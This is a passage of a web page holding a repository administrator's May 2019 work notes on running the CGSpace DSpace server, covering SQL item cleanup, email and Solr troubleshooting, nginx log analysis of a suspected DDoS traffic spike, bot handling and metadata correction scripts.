+<meta property="article:published_time" content="2019-05-01T07:37:43+03:00" />
+<meta property="article:modified_time" content="2020-04-13T15:30:24+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="May, 2019"/>
+<meta name="twitter:description" content="2019-05-01
+
+Help CCAFS with regenerating some item thumbnails after they uploaded new PDFs to some items on CGSpace
+A user on the dspace-tech mailing list offered some suggestions for troubleshooting the problem with the inability to delete certain items
+
+Apparently if the item is in the workflowitem table it is submitted to a workflow
+And if it is in the workspaceitem table it is in the pre-submitted state
+
+
+The item seems to be in a pre-submitted state, so I tried to delete it from there:
+
+dspace=# DELETE FROM workspaceitem WHERE item_id=74648;
+DELETE 1
+
+But after this I tried to delete the item from the XMLUI and it is still present&hellip;
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "May, 2019",
+  "url": "https://alanorth.github.io/cgspace-notes/2019-05/",
+  "wordCount": "3190",
+  "datePublished": "2019-05-01T07:37:43+03:00",
+  "dateModified": "2020-04-13T15:30:24+03:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2019-05/">
+
+    <title>May, 2019 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2019-05/">May, 2019</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2019-05-01T07:37:43+03:00">Wed May 01, 2019</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2019-05-01">2019-05-01</h2>
+<ul>
+<li>Help CCAFS with regenerating some item thumbnails after they uploaded new PDFs to some items on CGSpace</li>
+<li>A user on the dspace-tech mailing list offered some suggestions for troubleshooting the problem with the inability to delete certain items
+<ul>
+<li>Apparently if the item is in the <code>workflowitem</code> table it is submitted to a workflow</li>
+<li>And if it is in the <code>workspaceitem</code> table it is in the pre-submitted state</li>
+</ul>
+</li>
+<li>The item seems to be in a pre-submitted state, so I tried to delete it from there:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# DELETE FROM workspaceitem WHERE item_id=74648;
+DELETE 1
+</code></pre><ul>
+<li>But after this I tried to delete the item from the XMLUI and it is <em>still</em> present&hellip;</li>
+</ul>
+<ul>
+<li>I managed to delete the problematic item from the database
+<ul>
+<li>First I deleted the item&rsquo;s bitstream in XMLUI and then ran <code>dspace cleanup -v</code> to remove it from the assetstore</li>
+<li>Then I ran the following SQL:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>dspace=# DELETE FROM metadatavalue WHERE resource_id=74648;
+dspace=# DELETE FROM workspaceitem WHERE item_id=74648;
+dspace=# DELETE FROM item WHERE item_id=74648;
+</code></pre><ul>
+<li>Now the item is (hopefully) really gone and I can continue to troubleshoot the issue with REST API&rsquo;s <code>/items/find-by-metadata-value</code> endpoint
+<ul>
+<li>Of course I run into another HTTP 401 error when I continue trying the LandPortal search from last month:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ curl -f -H &#34;Content-Type: application/json&#34; -X POST &#34;http://localhost:8080/rest/items/find-by-metadata-field&#34; -d &#39;{&#34;key&#34;:&#34;cg.subject.cpwf&#34;, &#34;value&#34;:&#34;WATER MANAGEMENT&#34;,&#34;language&#34;: &#34;en_US&#34;}&#39;
+curl: (22) The requested URL returned error: 401 Unauthorized
+</code></pre><ul>
+<li>The DSpace log shows the item ID (because I modified the error text):</li>
+</ul>
+<pre tabindex="0"><code>2019-05-01 11:41:11,069 ERROR org.dspace.rest.ItemsResource @ User(anonymous) has not permission to read item(id=77708)!
+</code></pre><ul>
+<li>If I delete that one I get another, making the list of item IDs so far:
+<ul>
+<li>74648</li>
+<li>77708</li>
+<li>85079</li>
+</ul>
+</li>
+<li>Some are in the <code>workspaceitem</code> table (pre-submission), others are in the <code>workflowitem</code> table (submitted), and others are actually approved, but withdrawn&hellip;
+<ul>
+<li>This is actually a worthless exercise because the real issue is that the <code>/items/find-by-metadata-value</code> endpoint is simply designed flawed and shouldn&rsquo;t be fatally erroring when the search returns items the user doesn&rsquo;t have permission to access</li>
+<li>It would take way too much time to try to fix the fucked up items that are in limbo by deleting them in SQL, but also, it doesn&rsquo;t actually fix the problem because some items are <em>submitted</em> but <em>withdrawn</em>, so they actually have handles and everything</li>
+<li>I think the solution is to recommend people don&rsquo;t use the <code>/items/find-by-metadata-value</code> endpoint</li>
+</ul>
+</li>
+<li>CIP is asking about embedding PDF thumbnail images in their RSS feeds again
+<ul>
+<li>They asked in 2018-09 as well and I told them it wasn&rsquo;t possible</li>
+<li>To make sure, I looked at <a href="https://wiki.lyrasis.org/display/DSPACE/Enable+Media+RSS+Feeds">the documentation for RSS media feeds</a> and tried it, but couldn&rsquo;t get it to work</li>
+<li>It seems to be geared towards iTunes and Podcasts&hellip; I dunno</li>
+</ul>
+</li>
+<li>CIP also asked for a way to get an XML file of all their RTB journal articles on CGSpace
+<ul>
+<li>I told them to use the REST API like (where <code>1179</code> is the id of the RTB journal articles collection):</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>https://cgspace.cgiar.org/rest/collections/1179/items?limit=812&amp;expand=metadata
+</code></pre><h2 id="2019-05-03">2019-05-03</h2>
+<ul>
+<li>A user from CIAT emailed to say that CGSpace submission emails have not been working the last few weeks
+<ul>
+<li>I checked the <code>dspace test-email</code> script on CGSpace and they are indeed failing:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ dspace test-email
+
+About to send test email:
+ - To: woohoo@cgiar.org
+ - Subject: DSpace test email
+ - Server: smtp.office365.com
+
+Error sending email:
+ - Error: javax.mail.AuthenticationFailedException
+
+Please see the DSpace documentation for assistance.
+</code></pre><ul>
+<li>I will ask ILRI ICT to reset the password
+<ul>
+<li>They reset the password and I tested it on CGSpace</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-05-05">2019-05-05</h2>
+<ul>
+<li>Run all system updates on DSpace Test (linode19) and reboot it</li>
+<li>Merge changes into the <code>5_x-prod</code> branch of CGSpace:
+<ul>
+<li>Updates to remove deprecated social media websites (Google+ and Delicious), update Twitter share intent, and add item title to Twitter and email links (<a href="https://github.com/ilri/DSpace/pull/421">#421</a>)</li>
+<li>Add new CCAFS Phase II project tags (<a href="https://github.com/ilri/DSpace/pull/420">#420</a>)</li>
+<li>Add item ID to REST API error logging (<a href="https://github.com/ilri/DSpace/pull/422">#422</a>)</li>
+</ul>
+</li>
+<li>Re-deploy CGSpace from <code>5_x-prod</code> branch</li>
+<li>Run all system updates on CGSpace (linode18) and reboot it</li>
+<li>Tag version 1.1.0 of the <a href="https://github.com/ilri/dspace-statistics-api">dspace-statistics-api</a> (with Falcon 2.0.0)
+<ul>
+<li>Deploy on DSpace Test</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-05-06">2019-05-06</h2>
+<ul>
+<li>Peter pointed out that Solr stats are only showing 2019 stats
+<ul>
+<li>I looked at the Solr Admin UI and I see:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>statistics-2018: org.apache.solr.common.SolrException:org.apache.solr.common.SolrException: Error opening new searcher 
+</code></pre><ul>
+<li>As well as this error in the logs:</li>
+</ul>
+<pre tabindex="0"><code>Caused by: org.apache.lucene.store.LockObtainFailedException: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2018/data/index/write.lock
+</code></pre><ul>
+<li>Strangely enough, I <em>do</em> see the statistics-2018, statistics-2017, etc cores in the Admin UI&hellip;</li>
+<li>I restarted Tomcat a few times (and even deleted all the Solr write locks) and at least five times there were issues loading one statistics core, causing the Atmire stats to be incomplete
+<ul>
+<li>Also, I tried to increase the <code>writeLockTimeout</code> in <code>solrconfig.xml</code> from the default of 1000ms to 10000ms</li>
+<li>Eventually the Atmire stats started working, despite errors about &ldquo;Error opening new searcher&rdquo; in the Solr Admin UI</li>
+<li>I wrote to the dspace-tech mailing list again on the thread from March, 2019</li>
+</ul>
+</li>
+<li>There were a few alerts from UptimeRobot about CGSpace going up and down this morning, along with an alert from Linode about 596% load
+<ul>
+<li>Looking at the Munin stats I see an exponential rise in DSpace XMLUI sessions, firewall activity, and PostgreSQL connections this morning:</li>
+</ul>
+</li>
+</ul>
+<p><img src="/cgspace-notes/2019/05/2019-05-06-jmx_dspace_sessions-day.png" alt="CGSpace XMLUI sessions day"></p>
+<p><img src="/cgspace-notes/2019/05/2019-05-06-fw_conntrack-day.png" alt="linode18 firewall connections day"></p>
+<p><img src="/cgspace-notes/2019/05/2019-05-06-postgres_connections_db-day.png" alt="linode18 postgres connections day"></p>
+<p><img src="/cgspace-notes/2019/05/2019-05-06-cpu-day.png" alt="linode18 CPU day"></p>
+<ul>
+<li>The number of unique sessions today is <em>ridiculously</em> high compared to the last few days considering it&rsquo;s only 12:30PM right now:</li>
+</ul>
+<pre tabindex="0"><code>$ grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2019-05-06 | sort | uniq | wc -l
+101108
+$ grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2019-05-05 | sort | uniq | wc -l
+14618
+$ grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2019-05-04 | sort | uniq | wc -l
+14946
+$ grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2019-05-03 | sort | uniq | wc -l
+6410
+$ grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2019-05-02 | sort | uniq | wc -l
+7758
+$ grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2019-05-01 | sort | uniq | wc -l
+20528
+</code></pre><ul>
+<li>The number of unique IP addresses from 2 to 6 AM this morning is already several times higher than the average for that time of the morning this past week:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#39;06/May/2019:(02|03|04|05|06)&#39; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
+7127
+# zcat --force /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep -E &#39;05/May/2019:(02|03|04|05|06)&#39; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
+1231
+# zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz | grep -E &#39;04/May/2019:(02|03|04|05|06)&#39; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
+1255
+# zcat --force /var/log/nginx/access.log.3.gz /var/log/nginx/access.log.4.gz | grep -E &#39;03/May/2019:(02|03|04|05|06)&#39; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
+1736
+# zcat --force /var/log/nginx/access.log.4.gz /var/log/nginx/access.log.5.gz | grep -E &#39;02/May/2019:(02|03|04|05|06)&#39; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
+1573
+# zcat --force /var/log/nginx/access.log.5.gz /var/log/nginx/access.log.6.gz | grep -E &#39;01/May/2019:(02|03|04|05|06)&#39; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
+1410
+</code></pre><ul>
+<li>Just this morning between the hours of 2 and 6 the number of unique sessions was <em>very</em> high compared to previous mornings:</li>
+</ul>
+<pre tabindex="0"><code>$ cat dspace.log.2019-05-06 | grep -E &#39;2019-05-06 (02|03|04|05|06):&#39; | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
+83650
+$ cat dspace.log.2019-05-05 | grep -E &#39;2019-05-05 (02|03|04|05|06):&#39; | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
+2547
+$ cat dspace.log.2019-05-04 | grep -E &#39;2019-05-04 (02|03|04|05|06):&#39; | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
+2574
+$ cat dspace.log.2019-05-03 | grep -E &#39;2019-05-03 (02|03|04|05|06):&#39; | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
+2911
+$ cat dspace.log.2019-05-02 | grep -E &#39;2019-05-02 (02|03|04|05|06):&#39; | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
+2704
+$ cat dspace.log.2019-05-01 | grep -E &#39;2019-05-01 (02|03|04|05|06):&#39; | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
+3699
+</code></pre><ul>
+<li>Most of the requests were GETs:</li>
+</ul>
+<pre tabindex="0"><code># cat /var/log/nginx/{access,library-access}.log /var/log/nginx/{access,library-access}.log.1 | grep -E &#39;06/May/2019:(02|03|04|05|06)&#39; | grep -o -E &#34;(GET|HEAD|POST|PUT)&#34; | sort | uniq -c | sort -n
+      1 PUT
+     98 POST
+   2845 HEAD
+  98121 GET
+</code></pre><ul>
+<li>I&rsquo;m not exactly sure what happened this morning, but it looks like some legitimate user traffic—perhaps someone launched a new publication and it got a bunch of hits?</li>
+<li>Looking again, I see 84,000 requests to <code>/handle</code> this morning (not including logs for library.cgiar.org because those get HTTP 301 redirect to CGSpace and appear here in <code>access.log</code>):</li>
+</ul>
+<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#39;06/May/2019:(02|03|04|05|06)&#39; | grep -c -o -E &#34; /handle/[0-9]+/[0-9]+&#34;
+84350
+</code></pre><ul>
+<li>But it would be difficult to find a pattern for those requests because they cover 78,000 <em>unique</em> Handles (ie direct browsing of items, collections, or communities) and only 2,492 discover/browse (total, not unique):</li>
+</ul>
+<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#39;06/May/2019:(02|03|04|05|06)&#39; | grep -o -E &#34; /handle/[0-9]+/[0-9]+ HTTP&#34; | sort | uniq | wc -l
+78104
+# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#39;06/May/2019:(02|03|04|05|06)&#39; | grep -o -E &#34; /handle/[0-9]+/[0-9]+/(discover|browse)&#34; | wc -l
+2492
+</code></pre><ul>
+<li>In other news, I see some IP is making several requests per second to the exact same REST API endpoints, for example:</li>
+</ul>
+<pre tabindex="0"><code># grep /rest/handle/10568/3703?expand=all rest.log | awk &#39;{print $1}&#39; | sort | uniq -c
+      3 2a01:7e00::f03c:91ff:fe0a:d645
+    113 63.32.242.35
+</code></pre><ul>
+<li>According to <a href="https://viewdns.info/reverseip/?host=63.32.242.35&amp;t=1">viewdns.info</a> that server belongs to Macaroni Brothers
+<ul>
+<li>The user agent of their non-REST API requests from the same IP is Drupal</li>
+<li>This is one very good reason to limit REST API requests, and perhaps to enable caching via nginx</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-05-07">2019-05-07</h2>
+<ul>
+<li>The total number of unique IPs on CGSpace yesterday was almost 14,000, which is several thousand higher than previous day totals:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep -E &#39;06/May/2019&#39; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
+13969
+# zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz | grep -E &#39;05/May/2019&#39; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
+5936
+# zcat --force /var/log/nginx/access.log.3.gz /var/log/nginx/access.log.4.gz | grep -E &#39;04/May/2019&#39; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
+6229
+# zcat --force /var/log/nginx/access.log.4.gz /var/log/nginx/access.log.5.gz | grep -E &#39;03/May/2019&#39; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
+8051
+</code></pre><ul>
+<li>Total number of sessions yesterday was <em>much</em> higher compared to days last week:</li>
+</ul>
+<pre tabindex="0"><code>$ cat dspace.log.2019-05-06 | grep -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
+144160
+$ cat dspace.log.2019-05-05 | grep -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
+57269
+$ cat dspace.log.2019-05-04 | grep -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
+58648
+$ cat dspace.log.2019-05-03 | grep -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
+27883
+$ cat dspace.log.2019-05-02 | grep -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
+26996
+$ cat dspace.log.2019-05-01 | grep -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l
+61866
+</code></pre><ul>
+<li>The usage statistics seem to agree that yesterday was crazy:</li>
+</ul>
+<p><img src="/cgspace-notes/2019/05/2019-05-07-atmire-usage-week.png" alt="Atmire Usage statistics spike 2019-05-06"></p>
+<ul>
+<li>Sarah from RTB asked me about the RSS / XML link for the the CGIAR.org website again
+<ul>
+<li>Apparently Sam Stacey is trying to add an RSS feed so the items get automatically syndicated to the CGIAR website</li>
+<li>I send her the link to the collection RSS feed</li>
+</ul>
+</li>
+<li>Add requests cache to <code>resolve-addresses.py</code> script</li>
+</ul>
+<h2 id="2019-05-08">2019-05-08</h2>
+<ul>
+<li>A user said that CGSpace emails have stopped sending again
+<ul>
+<li>Indeed, the <code>dspace test-email</code> script is showing an authentication failure:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ dspace test-email
+
+About to send test email:
+ - To: wooooo@cgiar.org
+ - Subject: DSpace test email
+ - Server: smtp.office365.com
+
+Error sending email:
+ - Error: javax.mail.AuthenticationFailedException
+
+Please see the DSpace documentation for assistance.
+</code></pre><ul>
+<li>I checked the settings and apparently I had updated it incorrectly last week after ICT reset the password</li>
+<li>Help Moayad with certbot-auto for Let&rsquo;s Encrypt scripts on the new AReS server (linode20)</li>
+<li>Normalize all <code>text_lang</code> values for metadata on CGSpace and DSpace Test (as I had tested last month):</li>
+</ul>
+<pre tabindex="0"><code>UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN (&#39;ethnob&#39;, &#39;en&#39;, &#39;*&#39;, &#39;E.&#39;, &#39;&#39;);
+UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IS NULL;
+UPDATE metadatavalue SET text_lang=&#39;es_ES&#39; WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN (&#39;es&#39;, &#39;spa&#39;);
+</code></pre><ul>
+<li>Send Francesca Giampieri from Bioversity a CSV export of all their items issued in 2018
+<ul>
+<li>They will be doing a migration of 1500 items from their TYPO3 database into CGSpace soon and want an example CSV with all required metadata columns</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-05-10">2019-05-10</h2>
+<ul>
+<li>I finally had time to analyze the 7,000 IPs from the major traffic spike on 2019-05-06 after several runs of my <code>resolve-addresses.py</code> script (ipapi.co has a limit of 1,000 requests per day)</li>
+<li>Resolving the unique IP addresses to organization and AS names reveals some pretty big abusers:
+<ul>
+<li>1213 from Region40 LLC (AS200557)</li>
+<li>697 from Trusov Ilya Igorevych (AS50896)</li>
+<li>687 from UGB Hosting OU (AS206485)</li>
+<li>620 from UAB Rakrejus (AS62282)</li>
+<li>491 from Dedipath (AS35913)</li>
+<li>476 from Global Layer B.V. (AS49453)</li>
+<li>333 from QuadraNet Enterprises LLC (AS8100)</li>
+<li>278 from GigeNET (AS32181)</li>
+<li>261 from Psychz Networks (AS40676)</li>
+<li>196 from Cogent Communications (AS174)</li>
+<li>125 from Blockchain Network Solutions Ltd (AS43444)</li>
+<li>118 from Silverstar Invest Limited (AS35624)</li>
+</ul>
+</li>
+<li>All of the IPs from these networks are using generic user agents like this, but MANY more, and they change many times:</li>
+</ul>
+<pre tabindex="0"><code>&#34;Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2703.0 Safari/537.36&#34;
+</code></pre><ul>
+<li>I found a <a href="https://www.qurium.org/alerts/azerbaijan/azerbaijan-and-the-region40-ddos-service/">blog post from 2018 detailing an attack from a DDoS service</a> that matches our pattern exactly</li>
+<li>They specifically mention:</li>
+</ul>
+<!-- raw HTML omitted -->
+<ul>
+<li>So this was definitely an attack of some sort&hellip; only God knows why</li>
+<li>I noticed a few new bots that don&rsquo;t use the word &ldquo;bot&rdquo; in their user agent and therefore don&rsquo;t match Tomcat&rsquo;s Crawler Session Manager Valve:
+<ul>
+<li><code>Blackboard Safeassign</code></li>
+<li><code>Unpaywall</code></li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-05-12">2019-05-12</h2>
+<ul>
+<li>I see that the Unpaywall bot is resonsible for a few thousand XMLUI sessions every day (IP addresses come from nginx access.log):</li>
+</ul>
+<pre tabindex="0"><code>$ cat dspace.log.2019-05-11 | grep -E &#39;ip_addr=(100.26.206.188|100.27.19.233|107.22.98.199|174.129.156.41|18.205.243.110|18.205.245.200|18.207.176.164|18.207.209.186|18.212.126.89|18.212.5.59|18.213.4.150|18.232.120.6|18.234.180.224|18.234.81.13|3.208.23.222|34.201.121.183|34.201.241.214|34.201.39.122|34.203.188.39|34.207.197.154|34.207.232.63|34.207.91.147|34.224.86.47|34.227.205.181|34.228.220.218|34.229.223.120|35.171.160.166|35.175.175.202|3.80.201.39|3.81.120.70|3.81.43.53|3.84.152.19|3.85.113.253|3.85.237.139|3.85.56.100|3.87.23.95|3.87.248.240|3.87.250.3|3.87.62.129|3.88.13.9|3.88.57.237|3.89.71.15|3.90.17.242|3.90.68.247|3.91.44.91|3.92.138.47|3.94.250.180|52.200.78.128|52.201.223.200|52.90.114.186|52.90.48.73|54.145.91.243|54.160.246.228|54.165.66.180|54.166.219.216|54.166.238.172|54.167.89.152|54.174.94.223|54.196.18.211|54.198.234.175|54.208.8.172|54.224.146.147|54.234.169.91|54.235.29.216|54.237.196.147|54.242.68.231|54.82.6.96|54.87.12.181|54.89.217.141|54.89.234.182|54.90.81.216|54.91.104.162)&#39; | grep -E &#39;session_id=[A-Z0-9]{32}&#39; | sort | uniq | wc -l   
+2206
+</code></pre><ul>
+<li>I added &ldquo;Unpaywall&rdquo; to the list of bots in the Tomcat Crawler Session Manager Valve</li>
+<li>Set up nginx to use TLS and proxy pass to NodeJS on the AReS development server (linode20)</li>
+<li>Run all system updates on linode20 and reboot it</li>
+<li>Also, there is 10 to 20% CPU steal on that VM, so I will ask Linode to move it to another host</li>
+<li>Commit changes to the <code>resolve-addresses.py</code> script to add proper CSV output support</li>
+</ul>
+<h2 id="2019-05-14">2019-05-14</h2>
+<ul>
+<li>Skype with Peter and AgroKnow about CTA story telling modification they want to do on the CTA ICT Update collection on CGSpace
+<ul>
+<li>I told them they should aim for modifying the collection theme and insert some custom HTML / JS</li>
+<li>I need to send Panagis some documentation about Mirage 2 and the DSpace build process, as well as the Maven settings for build</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-05-15">2019-05-15</h2>
+<ul>
+<li>Tezira says she&rsquo;s having issues with email reports for approved submissions, but I received an email about collection subscriptions this morning, and I tested with <code>dspace test-email</code> and it&rsquo;s also working&hellip;</li>
+<li>Send a list of DSpace build tips to Panagis from AgroKnow</li>
+<li>Finally fix the AReS v2 to work via DSpace Test and send it to Peter et al to give their feedback
+<ul>
+<li>We had issues with CORS due to Moayad using a hard-coded domain name rather than a relative URL</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-05-16">2019-05-16</h2>
+<ul>
+<li>Export a list of all investors (<code>dc.description.sponsorship</code>) for Peter to look through and correct:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 29 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2019-05-16-investors.csv WITH CSV HEADER;
+COPY 995
+</code></pre><ul>
+<li>Fork the <a href="https://github.com/icarda-git/AReS">ICARDA AReS v1 repository</a> to <a href="https://github.com/ilri/AReS">ILRI&rsquo;s GitHub</a> and give access to CodeObia guys
+<ul>
+<li>The plan is that we develop the v2 code here</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-05-17">2019-05-17</h2>
+<ul>
+<li>Peter sent me a bunch of fixes for investors from yesterday</li>
+<li>I did a quick check in Open Refine (trim and collapse whitespace, clean smart quotes, etc) and then applied them on CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-05-16-fix-306-Investors.csv -db dspace-u dspace-p &#39;fuuu&#39; -f dc.description.sponsorship -m 29 -t correct -d
+$ ./delete-metadata-values.py -i /tmp/2019-05-16-delete-297-Investors.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 29 -f dc.description.sponsorship -d
+</code></pre><ul>
+<li>Then I started a full Discovery re-indexing:</li>
+</ul>
+<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m&#34;
+$ time schedtool -B -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
+</code></pre><ul>
+<li>I was going to make a new controlled vocabulary of the top 100 terms after these corrections, but I noticed a bunch of duplicates and variations when I sorted them alphabetically</li>
+<li>Instead, I exported a new list and asked Peter to look at it again</li>
+<li>Apply Peter&rsquo;s new corrections on DSpace Test and CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-05-17-fix-25-Investors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.description.sponsorship -m 29 -t correct -d
+$ ./delete-metadata-values.py -i /tmp/2019-05-17-delete-14-Investors.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 29 -f dc.description.sponsorship -d
+</code></pre><ul>
+<li>Then I re-exported the sponsors and took the top 100 to update the existing controlled vocabulary (<a href="https://github.com/ilri/DSpace/pull/423">#423</a>)
+<ul>
+<li>I will deploy the changes on CGSpace the next time we re-deploy</li>
+</ul>
+</li>
+</ul>
+<h2 id="2019-05-19">2019-05-19</h2>
+<ul>
+<li>Add &ldquo;ISI journal&rdquo; to item view sidebar at the request of Maria Garruccio</li>
+<li>Update <code>fix-metadata-values.py</code> and <code>delete-metadata-values.py</code> scripts to add some basic checking of CSV fields and colorize shell output using Colorama</li>
+</ul>
+<h2 id="2019-05-24">2019-05-24</h2>
+<ul>
+<li>Update AReS README.md on GitHub repository to add a proper introduction, credits, requirements, installation instructions, and legal information</li>
+<li>Update CIP subjects in input forms on CGSpace (<a href="https://github.com/ilri/DSpace/pull/424">#424</a>)</li>
+</ul>
+<h2 id="2019-05-25">2019-05-25</h2>
+<ul>
+<li>Help Abenet proof ten Africa Rice publications
+<ul>
+<li>Convert some dates to string (from number in Excel)</li>
+<li>Trim whitespace on all fields</li>
+<li>Correct and standardize affiliations</li>
+<li>Validate subject terms against AGROVOC</li>
+<li>Add rights information to all items</li>
+<li>Correct and standardize sponsors</li>
+</ul>
+</li>
+<li>Generate Simple Archive Format bundle with SAFBuilder and import into the <a href="https://cgspace.cgiar.org/handle/10568/101106">AfricaRice Articles in Journals</a> collection on CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>$ dspace import -a -e me@cgiar.org -m 2019-05-25-AfricaRice.map -s /tmp/SimpleArchiveFormat
+</code></pre><h2 id="2019-05-27">2019-05-27</h2>
+<ul>
+<li>Peter sent me over two thousand corrections for the authors on CGSpace that I had dumped last month
+<ul>
+<li>I proofed them for whitespace and invalid special characters in OpenRefine and then applied them on CGSpace and DSpace Test:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-05-27-fix-2472-Authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -m 3 -t corrections -d
+</code></pre><ul>
+<li>Then start a full Discovery re-indexing on each server:</li>
+</ul>
+<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m&#34;                                   
+$ time schedtool -B -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
+</code></pre><ul>
